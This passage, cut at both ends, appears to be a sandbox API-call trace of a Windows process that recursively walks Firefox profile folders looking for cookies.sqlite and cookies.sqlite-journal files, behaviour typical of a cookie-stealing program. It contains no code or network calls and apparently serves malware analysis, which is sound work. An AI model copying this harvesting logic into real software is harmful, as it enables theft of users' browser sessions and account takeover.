pszDest=0x79c7cb0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*" [0251.308] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*", lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 0x5c10870 [0251.309] FindNextFileW (in: hFindFile=0x5c10870, lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 1 [0251.309] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.309] FindNextFileW (in: hFindFile=0x5c10870, lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 1 [0251.309] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.309] lstrlenW (lpString="818200132aebmoouht.files") returned 24 [0251.309] PathCombineW (in: pszDest=0x79c7cb0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="818200132aebmoouht.files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0251.309] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x93 [0251.309] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", lpDst=0x79c8120, nSize=0x93 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned 0x93 [0251.309] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned 146 [0251.309] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.309] PathCombineW (in: pszDest=0x79c8250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\cookies.sqlite" [0251.309] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\cookies.sqlite", lpFindFileData=0x79c7ec0 | out: lpFindFileData=0x79c7ec0) returned 0xffffffffffffffff [0251.311] PathCombineW (in: pszDest=0x79c8250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*" [0251.311] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*", lpFindFileData=0x79c7ec0 | out: lpFindFileData=0x79c7ec0) returned 0x44070a0 [0251.311] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x79c7ec0 | out: lpFindFileData=0x79c7ec0) returned 1 [0251.311] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.311] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x79c7ec0 | out: lpFindFileData=0x79c7ec0) returned 1 [0251.311] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.311] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x79c7ec0 | out: lpFindFileData=0x79c7ec0) returned 1 [0251.311] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.311] lstrlenW (lpString="journals") returned 8 [0251.311] PathCombineW (in: pszDest=0x79c8250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="journals" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals" [0251.311] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x9c [0251.311] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", lpDst=0x79c86c0, nSize=0x9c | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned 0x9c [0251.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned 155 [0251.311] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.311] PathCombineW (in: pszDest=0x79c8800, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\cookies.sqlite" [0251.311] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\cookies.sqlite", lpFindFileData=0x79c8460 | out: lpFindFileData=0x79c8460) returned 0xffffffffffffffff [0251.319] PathCombineW (in: pszDest=0x79c8800, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*" [0251.319] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*", lpFindFileData=0x79c8460 | out: lpFindFileData=0x79c8460) returned 0x44067a0 [0251.319] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c8460 | out: lpFindFileData=0x79c8460) returned 1 [0251.319] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.319] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c8460 | out: lpFindFileData=0x79c8460) returned 0 [0251.319] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.320] FindNextFileW (in: hFindFile=0x44070a0, lpFindFileData=0x79c7ec0 | out: lpFindFileData=0x79c7ec0) returned 0 [0251.320] FindClose (in: hFindFile=0x44070a0 | out: hFindFile=0x44070a0) returned 1 [0251.320] FindNextFileW (in: hFindFile=0x5c10870, lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 1 [0251.320] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.320] FindNextFileW (in: hFindFile=0x5c10870, lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 0 [0251.320] FindClose (in: hFindFile=0x5c10870 | out: hFindFile=0x5c10870) returned 1 [0251.320] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 0 [0251.320] FindClose (in: hFindFile=0x5c0f850 | out: hFindFile=0x5c0f850) returned 1 [0251.320] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0251.320] FindClose (in: hFindFile=0x5c103f0 | out: hFindFile=0x5c103f0) returned 1 [0251.320] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0251.321] FindClose (in: hFindFile=0x5c0feb0 | out: hFindFile=0x5c0feb0) returned 1 [0251.321] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.321] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.321] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.321] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.321] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.321] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.321] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.321] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.321] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 0 [0251.321] FindClose (in: hFindFile=0x4404d90 | out: hFindFile=0x4404d90) returned 1 [0251.321] FindNextFileW (in: hFindFile=0x4404f10, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0 [0251.322] FindClose (in: hFindFile=0x4404f10 | out: hFindFile=0x4404f10) returned 1 [0251.322] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Mozilla\\Firefox\\Profiles", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3f [0251.322] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Mozilla\\Firefox\\Profiles", lpDst=0x7aae530, nSize=0x3f | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3f [0251.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 62 [0251.322] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.322] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\cookies.sqlite-journal" [0251.322] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\cookies.sqlite-journal", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0251.322] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0251.322] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x4407760 [0251.322] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.322] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.322] FindNextFileW (in: hFindFile=0x4407760, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.322] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.322] lstrlenW (lpString="8i341t8m.default") returned 16 [0251.323] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="8i341t8m.default" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0251.323] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x50 [0251.323] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpDst=0x7aae5c0, nSize=0x50 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 0x50 [0251.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 79 [0251.323] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.323] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite-journal" [0251.323] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite-journal", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0xffffffffffffffff [0251.323] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*" [0251.323] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*", lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 0x4406380 [0251.323] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.323] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.323] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.323] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.323] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.323] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.323] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.323] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.323] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.323] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.324] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.324] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.324] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.324] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.324] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.324] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.324] lstrlenW (lpString="bookmarkbackups") returned 15 [0251.324] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="bookmarkbackups" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups" [0251.324] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0251.324] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", lpDst=0x7aaf190, nSize=0x60 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned 0x60 [0251.324] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups") returned 95 [0251.324] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.324] PathCombineW (in: pszDest=0x7aaf260, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\cookies.sqlite-journal" [0251.324] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.324] PathCombineW (in: pszDest=0x7aaf260, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*" [0251.324] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\bookmarkbackups\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x44079a0 [0251.324] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.324] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.324] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.324] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.324] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.325] FindClose (in: hFindFile=0x44079a0 | out: hFindFile=0x44079a0) returned 1 [0251.325] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.325] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.325] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.325] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.325] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.325] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.325] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.325] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.325] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.325] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.325] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.325] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.325] lstrlenW (lpString="crashes") returned 7 [0251.325] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="crashes" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes" [0251.325] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0251.325] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", lpDst=0x7aaf190, nSize=0x58 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned 0x58 [0251.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes") returned 87 [0251.325] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.325] PathCombineW (in: pszDest=0x7aaf250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\cookies.sqlite-journal" [0251.325] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.326] PathCombineW (in: pszDest=0x7aaf250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*" [0251.326] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x44067a0 [0251.326] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.326] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.326] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.326] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.326] lstrlenW (lpString="events") returned 6 [0251.326] PathCombineW (in: pszDest=0x7aaf250, 